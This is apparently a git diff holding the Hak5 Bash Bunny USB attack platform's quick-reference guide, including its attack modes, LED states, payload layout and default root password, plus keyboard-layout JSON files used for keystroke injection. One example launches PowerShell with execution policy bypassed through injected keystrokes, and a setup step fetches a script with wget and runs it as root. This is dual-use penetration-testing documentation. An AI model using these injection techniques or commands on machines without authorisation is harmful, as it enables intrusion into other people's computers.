|-remove.sh Uninstall/Cleanup script for complex payloads
|
||||
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Windows
|
||||
-----------------------------------------------------------------------------
|
||||
- Configure a payload.txt for ATTACKMODE RNDIS_ETHERNET
|
||||
- Boot Bash Bunny from RNDIS_ETHERNET set payload on the host Windows PC
|
||||
- Open Control Panel > Network Connections (Start > Run > "ncpa.cpl" > Enter)
|
||||
- Identify Bash Bunny interface. Device name: "USB Ethernet/RNDIS Gadget"
|
||||
- Right-click Internet interface (e.g. Wi-Fi) and click Properties.
|
||||
- From the Sharing tab, check "Allow other network users to connect through
|
||||
this computer's Internet connection", select the Bash Bunny from the
|
||||
Home networking connection list (e.g. Ethernet 2) and click OK.
|
||||
- Right-click Bash Bunny interface (e.g. Ethenet 2) and click Properties.
|
||||
- Select TCP/IPv4 and click Properties.
|
||||
- Set the IP address to 172.16.64.64. Leave Subnet mask as 255.255.255.0 and
|
||||
click OK on both properties windows. Internet Connection Sharing is complete
|
||||
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Linux
|
||||
-----------------------------------------------------------------------------
|
||||
- Download the Internet Connection Sharing script from bashbunny.com/bb.sh
|
||||
e.g: wget bashbunny.com/bb.sh
|
||||
- Run the bb.sh connection script with bash as root
|
||||
e.g: sudo bash ./bb.sh
|
||||
- Follow the [M]anual or [G]uided setup to configure iptables and routing
|
||||
- Save settings for future sessions and [C]onnect
|
||||
|
||||
|
||||
|
||||
ATTACKMODE Command
|
||||
-----------------------------------------------------------------------------
|
||||
ATTACKMODE sets the device emulation parameters for the Bash Bunny.
|
||||
Three of five attack modes may be executed simultaneously.
|
||||
|
||||
Parameter Type Target/Use
|
||||
-------------- ------------------------------------ -------------------
|
||||
SERIAL ACM Abstract Control Model Serial Console
|
||||
ECM_ETHERNET ECM Ethernet Control Model Linux/Mac/Android
|
||||
RNDIS_ETHERNET RNDIS Remote Network Dvr Int Spec Windows (some *nix)
|
||||
STORAGE UMS USB Mass Storage Flash Drive
|
||||
HID HID Human Interface Device Keystroke Injection
|
||||
|
||||
|
||||
|
||||
LED Command
|
||||
-----------------------------------------------------------------------------
|
||||
The multi-color LED enables at-a-glance information on payload status.
|
||||
The LED is controlled via the LED command, from the console or payload.txt
|
||||
|
||||
Usage: LED [COLOR] [PATTERN] or LED [STATE]
|
||||
|
||||
COLORS
|
||||
------
|
||||
In addition to Red, Green and Blue, additive color mixing is possible.
|
||||
|
||||
-------- --------------------------------------------
|
||||
R Red
|
||||
G Green
|
||||
B Blue
|
||||
Y, R G Yellow (Commonly known as Amber)
|
||||
C, G B Cyan (Commonly known as Light Blue)
|
||||
M, R B Magenta (Commonly known as Violet or Purple)
|
||||
W, R G B White (Combination of R + G + B)
|
||||
|
||||
PATTERNS
|
||||
-------- --------------------------------------------------------
|
||||
SOLID *Default. No blink. Used if pattern argument is ommitted
|
||||
|
||||
SLOW Symmetric 1000ms ON, 1000ms OFF, repeating
|
||||
FAST Symmetric 100ms ON, 100ms OFF, repeating
|
||||
VERYFAST Symmetric 10ms ON, 10ms OFF, repeating
|
||||
|
||||
SINGLE 1 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
DOUBLE 2 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
TRIPLE 3 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUAD 4 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUIN 5 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
|
||||
ISINGLE 1 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IDOUBLE 2 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
ITRIPLE 3 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUAD 4 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUIN 5 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
|
||||
SUCCESS 1000ms VERYFAST blink followed by SOLID
|
||||
# Custom value in ms for continuous symmetric blinking
|
||||
|
||||
STATES
|
||||
---------------------------------------------------------------------
|
||||
In addition to the combinations of COLORS and PATTERNS listed above,
|
||||
these standardized LED STATES may be used to indicate payload status:
|
||||
|
||||
---------- ------------- ---------------------------------------------
|
||||
SETUP M SOLID Magenta solid
|
||||
|
||||
FAIL R SLOW Red slow blink
|
||||
FAIL1 R SLOW Red slow blink
|
||||
FAIL2 R FAST Red fast blink
|
||||
FAIL3 R VERYFAST Red very fast blink
|
||||
|
||||
ATTACK Y SINGLE Yellow single blink
|
||||
STAGE1 Y SINGLE Yellow single blink
|
||||
STAGE2 Y DOUBLE Yellow double blink
|
||||
STAGE3 Y TRIPLE Yellow triple blink
|
||||
STAGE4 Y QUAD Yellow quadruple blink
|
||||
STAGE5 Y QUIN Yellow quintuple blink
|
||||
|
||||
SPECIAL C ISINGLE Cyan inverted single blink
|
||||
SPECIAL1 C ISINGLE Cyan inverted single blink
|
||||
SPECIAL2 C IDOUBLE Cyan inverted double blink
|
||||
SPECIAL3 C ITRIPLE Cyan inverted triple blink
|
||||
SPECIAL4 C IQUAD Cyan inverted quadriple blink
|
||||
SPECIAL5 C IQUIN Cyan inverted quintuple blink
|
||||
|
||||
CLEANUP W FAST White fast blink
|
||||
FINISH G SUCCESS Green 1000ms VERYFAST blink followed by SOLID
|
||||
|
||||
OFF Turns the LED off
|
||||
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
(\___/) Find further documentation, repository of payloads, (\___/)
|
||||
(='.'=) tutorial videos and community support forums at (='.'=)
|
||||
(")_(") bashbunny.com. (C) Hak5 LLC (")_(")
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.5 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
+---- | The Bash Bunny by Hak5 is a simple and powerful
|
||||
| : | Boot Modes | multi-function USB attack and automation platform
|
||||
+---- * | for penetration testers and systems administrators.
|
||||
+--|||------------+
|
||||
|||
|
||||
||+-- (sw1) Switch Position 1: Customizeable Payload.
|
||||
|+-- (sw2) Switch Position 2: Customizeable Payload.
|
||||
+-- (sw3) Switch Position 3: Arming Mode - Serial + Mass Storage.
|
||||
|
||||
|
||||
|
||||
Welcome & Updating the Bash Bunny Software
|
||||
------------------------------------------------------------------------------
|
||||
Congratulations on your new Bash Bunny by Hak5! For the best experience, we
|
||||
recommend updating to the latest framework version and payload set from the
|
||||
downloads section of https://www.bashbunny.com. There you will find a wealth
|
||||
of knowledge and a helpful community of creative penetration testers and
|
||||
IT professionals. Welcome!
|
||||
|
||||
|
||||
|
||||
Mass-Storage Directory Structure Default Settings
|
||||
-------------------------------------------- -----------------------------
|
||||
.
|
||||
|-config.txt - Global config script Username: root
|
||||
| Sourced by all payloads Password: hak5bunny
|
||||
|-payloads/ Hostname: bunny
|
||||
| |-library/
|
||||
| | |-* Payloads from Bash Bunny repository IP Address: 172.16.64.1
|
||||
| | DHCP Range: 172.16.64.10-12
|
||||
| |-extensions/ - Additional Bunny Script
|
||||
| | commands/functions. LED Status:
|
||||
| |-switch1/ Green Solid - Boot up
|
||||
| | |-payload.txt - Bunny Script executed on Blue Blink - Arming Mode
|
||||
| | boot in switch position 1 Red/Blue Blink - Recovery
|
||||
| |-switch2/
|
||||
| | |-payload.txt - Bunny Script executed on
|
||||
| | boot in switch position 2
|
||||
| |-arming/
|
||||
| |-payload.txt - Override payload for
|
||||
| Arming Mode *USE CAUTION*
|
||||
|
|
||||
|-loot/ - Where payloads store logs and data
|
||||
|-docs/ - EULA, License, this readme.txt
|
||||
|-tools/ - Contents placed here will be copied
|
||||
| to /tools at boot in arming mode.
|
||||
| *.deb packages will be installed.
|
||||
|-languages/ - HID languages placed here will
|
||||
install at boot in arming mode.
|
||||
|
||||
|
||||
|
||||
Partitions Recovery
|
||||
-------------------------------------- -------------------------------------
|
||||
/dev/root - Main Linux file system If the Bash Bunny Setup Mode fails to
|
||||
/dev/nandg - Recovery file systems boot >3 times the file system will
|
||||
do not modify recover automatically. DO NOT UNPLUG
|
||||
/dev/nandf - Mass storage partition while the LED is blinking in an
|
||||
Mounted at /root/udisk alternating Red/Blue pattern. This
|
||||
/root/udisk - Mass storage mount point process requires 5-10 minutes.
|
||||
|
||||
|
||||
|
||||
Bunny Script Builtin Commands Ducky Script
|
||||
----------------------------------------------------------- ---------------
|
||||
ATTACKMODE Specifies the USB devices to emulate. REM
|
||||
Accepts combinations of three: SERIAL, DELAY
|
||||
ECM_ETHERNET, RNDIS_ETHERNET, STORAGE, HID, STRING
|
||||
RO_STORAGE or disable all USB with OFF SPACE
|
||||
WINDOWS/GUI
|
||||
LED Control the RGB LED. Accepts color and pattern MENU/APP
|
||||
or predefined payload state. SHIFT
|
||||
See detail from LED section. ALT
|
||||
CONTROL/CTRL
|
||||
QUACK Injects specified keystrokes via Ducky Script UPARROW/UP
|
||||
Accepts file relative to /payloads/ path DOWNARROW/DOWN
|
||||
Accepts inline Ducky Script LEFTARROW/LEFT
|
||||
RIGHTARROW/RIGHT
|
||||
Q Alias for QUACK PAUSE/BREAK
|
||||
DELETE
|
||||
Example: END
|
||||
QUACK helloworld.txt Inject keystrokes from file ESCAPE/ESC
|
||||
Q STRING Hello World Inject keystrokes from Ducky Script HOME
|
||||
INSERT
|
||||
DUCKY_LANG=us Sets keystroke injection language PAGEUP P
|
||||
PAGEDOWN
|
||||
PRINTSCREEN
|
||||
SPACE
|
||||
Bunny Script Environment Variables TAB
|
||||
---------------------------------------------------------- NUMLOCK
|
||||
$TARGET_IP IP Address of the computer received SCROLLOCK
|
||||
by the Bash Bunny DHCP Server. CAPSLOCK
|
||||
$TARGET_HOSTNAME Host name of the computer on the F1...F12
|
||||
Bash Bunny network.
|
||||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
$BB_LABEL Volume name of the BashBunny
|
||||
when mounted.
|
||||
|
||||
|
||||
|
||||
Bash Bunny Extensions
|
||||
-----------------------------------------------------------------------------
|
||||
The Bash Bunny scripting language is further enhanced by additional commands,
|
||||
known as extensions. Sourced from payloads/library/extensions/* at run-time,
|
||||
payloads may make use of these command. Similar to payloads, the extensions
|
||||
can be obtain and updated from the Bash Bunny repository.
|
||||
|
||||
RUN - Simplifies command execution for HID attacks.
|
||||
Usage: RUN [OS] [Command]
|
||||
RUN WIN notepad.exe
|
||||
RUN WIN "powershell -Exec Bypass \"tree c:\\ > tree.txt; type tree.txt\"
|
||||
RUN OSX http://www.example.com
|
||||
|
||||
|
||||
CUCUMBER - CPU Control (May be specified globally in /config.txt)
|
||||
Usage: CUCUMBER [Mode]
|
||||
CUCUMBER ENABLE Single CPU core mode with governor set to ondemand
|
||||
*Best thermal option for long-term deployments
|
||||
CUCUMBER DISABLE Quad CPU core mode with governor set to ondemand
|
||||
*Default behavior. Best overall power/performance
|
||||
CUCUMBER PLAID Quad CPU core mode with governor set to performance
|
||||
*Ludicrous speed. Not intended for long-term deployments.
|
||||
|
||||
|
||||
DUCKY_LANG - Specifies HID injection language for QUACK commands
|
||||
Usage: DUCKY_LANG [Language]
|
||||
DUCKY_LANG us
|
||||
* Specified in two letter language abbreviation
|
||||
* Uses language json file from langauge database (updated via /languages)
|
||||
|
||||
|
||||
REQUIRETOOL - Checks if a tool is installed. Exits with LED FAIL if not.
|
||||
Usage: REQUIRETOOL [tool]
|
||||
REQUIRETOOL impacket
|
||||
* Checks /tools/ for named directory or system installed tool name
|
||||
|
||||
|
||||
GET - Returns variable
|
||||
Usage: GET [variable]
|
||||
GET TARGET_IP Returns $TARGET_IP
|
||||
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
|
||||
GET HOST_IP Returns $HOST_IP
|
||||
GET SWITCH_POSITION Returns $SWITCH_POSITION
|
||||
GET TARGET_OS Returns $TARGET_OS
|
||||
GET BB_LABEL Returns $BB_LABEL
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Windows Serial Settings
|
||||
--------------------------------------------------------- ---------------
|
||||
Find the COM# from Device Manager > Ports (COM & LPT) 115200/8N1
|
||||
Look for USB Serial Device (COM#). Example: COM3
|
||||
Or run the following powershell command to list ports: Baud: 115200
|
||||
[System.IO.Ports.SerialPort]::getportnames() Data Bits: 8
|
||||
Parity Bit: No
|
||||
Open Putty (putty.org) and select Serial. Enter COM# for Stop Bit: 1
|
||||
serial line and 115200 for Speed. Clock Open.
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Linux/Mac
|
||||
-----------------------------------------------------------------------------
|
||||
Find the device from the terminal with: "ls /dev/tty*" or "dmesg | grep tty"
|
||||
On Linux the Bash Bunny may be /dev/ttyUSB0 or /dev/ttyACM0
|
||||
Connect to the serial device with screen. (apt-get install screen if needed)
|
||||
Example: "sudo screen /dev/ttyACM0 115200"
|
||||
Disconnect with keyboard combo: CTRL+a followed by CTRL+\
|
||||
|
||||
|
||||
|
||||
Example Payload Structure
|
||||
-------------------------
|
||||
/config.txt - Sourced by all payloads enabling global configurations
|
||||
Example: DUCKY_LANG us
|
||||
/payloads/switch#/
|
||||
|-payload.txt Primary payload file executed on boot in
|
||||
| specified switch position
|
||||
|-readme.md Payload documentation in markdown for github
|
||||
|-install.sh Installation script for complex payloads
|
||||
requiring initial setup (may require Internet)
|
||||
/payloads/arming/
|
||||
|-payload.txt Special payload executed when switch is in
|
||||
position 3 (arming mode). Overrides default
|
||||
STORAGE+SERIAL mode. For advanced users only.
|
||||
WARNING: Be careful not to lock yourself out
|
||||
of the Bash Bunny by disabling access via
|
||||
STORAGE or SERIAL when using this feature.
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Windows
|
||||
-----------------------------------------------------------------------------
|
||||
- Configure a payload.txt for ATTACKMODE RNDIS_ETHERNET
|
||||
- Boot Bash Bunny from RNDIS_ETHERNET set payload on the host Windows PC
|
||||
- Open Control Panel > Network Connections (Start > Run > "ncpa.cpl" > Enter)
|
||||
- Identify Bash Bunny interface. Device name: "USB Ethernet/RNDIS Gadget"
|
||||
- Right-click Internet interface (e.g. Wi-Fi) and click Properties.
|
||||
- From the Sharing tab, check "Allow other network users to connect through
|
||||
this computer's Internet connection", select the Bash Bunny from the
|
||||
Home networking connection list (e.g. Ethernet 2) and click OK.
|
||||
- Right-click Bash Bunny interface (e.g. Ethenet 2) and click Properties.
|
||||
- Select TCP/IPv4 and click Properties.
|
||||
- Set the IP address to 172.16.64.64. Leave Subnet mask as 255.255.255.0 and
|
||||
click OK on both properties windows. Internet Connection Sharing is complete
|
||||
|
||||
|
||||
|
||||
Share Internet Connection with Bash Bunny from Linux
|
||||
-----------------------------------------------------------------------------
|
||||
- Download the Internet Connection Sharing script from bashbunny.com/bb.sh
|
||||
e.g: wget bashbunny.com/bb.sh
|
||||
- Run the bb.sh connection script with bash as root
|
||||
e.g: sudo bash ./bb.sh
|
||||
- Follow the [M]anual or [G]uided setup to configure iptables and routing
|
||||
- Save settings for future sessions and [C]onnect
|
||||
|
||||
|
||||
|
||||
ATTACKMODE Command
|
||||
-----------------------------------------------------------------------------
|
||||
ATTACKMODE sets the device emulation parameters for the Bash Bunny.
|
||||
Three attack modes may be executed simultaneously.
|
||||
|
||||
Parameter Type Target/Use
|
||||
-------------- ------------------------------------ ------------------------
|
||||
SERIAL ACM Abstract Control Model Serial Console
|
||||
ECM_ETHERNET ECM Ethernet Control Model Linux/Mac/Android
|
||||
RNDIS_ETHERNET RNDIS Remote Network Dvr Int Spec Windows (some *nix)
|
||||
STORAGE UMS USB Mass Storage Flash Drive
|
||||
RO_STORAGE UMS USB Mass Storage Read-Only Flash Drive
|
||||
HID HID Human Interface Device Keystroke Injection
|
||||
|
||||
ATTACKMODE Advanced Parameters
|
||||
------------- ----------------------------------------------------------------
|
||||
PID_ Specifies the USB device product ID
|
||||
VID_ Specifies the USB device vendor ID
|
||||
MAN_ Specifies the USB device manufacturer
|
||||
SN_ Specifies the USB device serial number
|
||||
OFF Disables all USB emulaiton
|
||||
|
||||
Example:
|
||||
ATTACKMODE HID STORAGE VID_0XF000 PID_0X1234 SN_12345678 MAN_HAK5
|
||||
|
||||
|
||||
|
||||
LED Command
|
||||
-----------------------------------------------------------------------------
|
||||
The multi-color LED enables at-a-glance information on payload status.
|
||||
The LED is controlled via the LED command, from the console or payload.txt
|
||||
|
||||
Usage: LED [COLOR] [PATTERN] or LED [STATE]
|
||||
|
||||
COLORS
|
||||
------
|
||||
In addition to Red, Green and Blue, additive color mixing is possible.
|
||||
|
||||
-------- --------------------------------------------
|
||||
R Red
|
||||
G Green
|
||||
B Blue
|
||||
Y, R G Yellow (Commonly known as Amber)
|
||||
C, G B Cyan (Commonly known as Light Blue)
|
||||
M, R B Magenta (Commonly known as Violet or Purple)
|
||||
W, R G B White (Combination of R + G + B)
|
||||
|
||||
PATTERNS
|
||||
-------- --------------------------------------------------------
|
||||
SOLID *Default. No blink. Used if pattern argument is ommitted
|
||||
|
||||
SLOW Symmetric 1000ms ON, 1000ms OFF, repeating
|
||||
FAST Symmetric 100ms ON, 100ms OFF, repeating
|
||||
VERYFAST Symmetric 10ms ON, 10ms OFF, repeating
|
||||
|
||||
SINGLE 1 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
DOUBLE 2 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
TRIPLE 3 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUAD 4 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
QUIN 5 100ms blink(s) ON followed by 1 second OFF, repeating
|
||||
|
||||
ISINGLE 1 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IDOUBLE 2 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
ITRIPLE 3 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUAD 4 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
IQUIN 5 100ms blink(s) OFF followed by 1 second ON, repeating
|
||||
|
||||
SUCCESS 1000ms VERYFAST blink followed by SOLID
|
||||
# Custom value in ms for continuous symmetric blinking
|
||||
|
||||
STATES
|
||||
---------------------------------------------------------------------
|
||||
In addition to the combinations of COLORS and PATTERNS listed above,
|
||||
these standardized LED STATES may be used to indicate payload status:
|
||||
|
||||
---------- ------------- ---------------------------------------------
|
||||
SETUP M SOLID Magenta solid
|
||||
|
||||
FAIL R SLOW Red slow blink
|
||||
FAIL1 R SLOW Red slow blink
|
||||
FAIL2 R FAST Red fast blink
|
||||
FAIL3 R VERYFAST Red very fast blink
|
||||
|
||||
ATTACK Y SINGLE Yellow single blink
|
||||
STAGE1 Y SINGLE Yellow single blink
|
||||
STAGE2 Y DOUBLE Yellow double blink
|
||||
STAGE3 Y TRIPLE Yellow triple blink
|
||||
STAGE4 Y QUAD Yellow quadruple blink
|
||||
STAGE5 Y QUIN Yellow quintuple blink
|
||||
|
||||
SPECIAL C ISINGLE Cyan inverted single blink
|
||||
SPECIAL1 C ISINGLE Cyan inverted single blink
|
||||
SPECIAL2 C IDOUBLE Cyan inverted double blink
|
||||
SPECIAL3 C ITRIPLE Cyan inverted triple blink
|
||||
SPECIAL4 C IQUAD Cyan inverted quadriple blink
|
||||
SPECIAL5 C IQUIN Cyan inverted quintuple blink
|
||||
|
||||
CLEANUP W FAST White fast blink
|
||||
FINISH G SUCCESS Green 1000ms VERYFAST blink followed by SOLID
|
||||
|
||||
OFF Turns the LED off
|
||||
|
||||
-----------------------------------------------------------------------------
|
||||
|
||||
(\___/) Find further documentation, repository of payloads, (\___/)
|
||||
(='.'=) tutorial videos and community support forums at (='.'=)
|
||||
(")_(") bashbunny.com. (C) Hak5 LLC (")_(")
|
||||
|
||||
170
languages/ca-fr.json
Normal file
170
languages/ca-fr.json
Normal file
@@ -0,0 +1,170 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":"A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment":" ",
|
||||
"__comment":" Canadian french version made by Dominic Villeneuve",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"0":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"-":"00,00,2d",
|
||||
"=":"00,00,2e",
|
||||
"^":"00,00,2f",
|
||||
"<":"40,00,36",
|
||||
";":"00,00,33",
|
||||
"`":"40,00,2f",
|
||||
"#":"02,00,20",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,35",
|
||||
"/":"00,00,35",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"?":"02,00,23",
|
||||
"&":"02,00,24",
|
||||
"*":"02,00,25",
|
||||
"(":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"_":"02,00,2d",
|
||||
"+":"02,00,2e",
|
||||
">":"40,00,37",
|
||||
":":"02,00,33",
|
||||
"|":"40,00,35",
|
||||
"'":"02,00,36",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"\\":"02,00,35",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"@":"02,00,1f",
|
||||
"[":"40,00,26",
|
||||
"]":"40,00,27",
|
||||
"}":"40,00,25",
|
||||
"~":"40,00,30",
|
||||
"{":"40,00,24",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,34",
|
||||
"COMMAND-CTRL":"40,00,34",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,34"
|
||||
}
|
||||
@@ -165,5 +165,104 @@
|
||||
"\\":"40,00,64",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64",
|
||||
"__comment":"Everything below was additionally added by kuyaya",
|
||||
"GUI-l":"08,00,0f",
|
||||
"RIGHTSHIFT":"20,00,00",
|
||||
"A":"20,00,04",
|
||||
"B":"20,00,05",
|
||||
"C":"20,00,06",
|
||||
"D":"20,00,07",
|
||||
"E":"20,00,08",
|
||||
"F":"20,00,09",
|
||||
"G":"20,00,0a",
|
||||
"H":"20,00,0b",
|
||||
"I":"20,00,0c",
|
||||
"J":"20,00,0d",
|
||||
"K":"20,00,0e",
|
||||
"L":"20,00,0f",
|
||||
"M":"20,00,10",
|
||||
"N":"20,00,11",
|
||||
"O":"20,00,12",
|
||||
"P":"20,00,13",
|
||||
"Q":"20,00,14",
|
||||
"R":"20,00,15",
|
||||
"S":"20,00,16",
|
||||
"T":"20,00,17",
|
||||
"U":"20,00,18",
|
||||
"V":"20,00,19",
|
||||
"W":"20,00,1a",
|
||||
"X":"20,00,1b",
|
||||
"Z":"20,00,1c",
|
||||
"Y":"20,00,1d",
|
||||
"+":"20,00,1e",
|
||||
"\"":"20,00,1f",
|
||||
"*":"20,00,20",
|
||||
"%":"20,00,22",
|
||||
"&":"20,00,23",
|
||||
"/":"20,00,24",
|
||||
"(":"20,00,25",
|
||||
")":"20,00,26",
|
||||
"=":"20,00,27",
|
||||
"?":"20,00,2d",
|
||||
"`":"20,00,2e",
|
||||
"!":"20,00,30",
|
||||
";":"20,00,36",
|
||||
":":"20,00,37",
|
||||
"_":"20,00,38",
|
||||
">":"20,00,64",
|
||||
"°":"02,00,35",
|
||||
"°":"20,00,35",
|
||||
"§":"00,00,35",
|
||||
"ç":"02,00,21",
|
||||
"ç":"20,00,21",
|
||||
"¬":"40,00,23",
|
||||
"¦":"40,00,1e",
|
||||
"¢":"40,00,25",
|
||||
"´":"40,00,2d",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"SHIFT-BACKSPACE":"02,00,2a",
|
||||
"SHIFT-BACKSPACE":"20,00,2a",
|
||||
"€":"40,00,08",
|
||||
"è":"02,00,2f",
|
||||
"è":"20,00,2f",
|
||||
"ü":"00,00,2f",
|
||||
"¨":"00,00,30",
|
||||
"é":"02,00,33",
|
||||
"é":"20,00,33",
|
||||
"ö":"00,00,33",
|
||||
"ä":"00,00,34",
|
||||
"à":"02,00,34",
|
||||
"à":"20,00,34",
|
||||
"£":"02,00,32",
|
||||
"£":"20,00,32",
|
||||
"ALT-GR":"40,00,00",
|
||||
"RIGHTCONTROL":"10,00,00",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"+":"00,00,57",
|
||||
"-":"00,00,56",
|
||||
"*":"00,00,55",
|
||||
"/":"00,00,54",
|
||||
"ENTER":"00,00,58",
|
||||
"DEL":"00,00,63",
|
||||
"INSERT":"00,00,62",
|
||||
"END":"00,00,59",
|
||||
"DOWN":"00,00,5a",
|
||||
"PAGEDOWN":"00,00,5b",
|
||||
"LEFT":"00,00,5c",
|
||||
"RIGHT":"00,00,5e",
|
||||
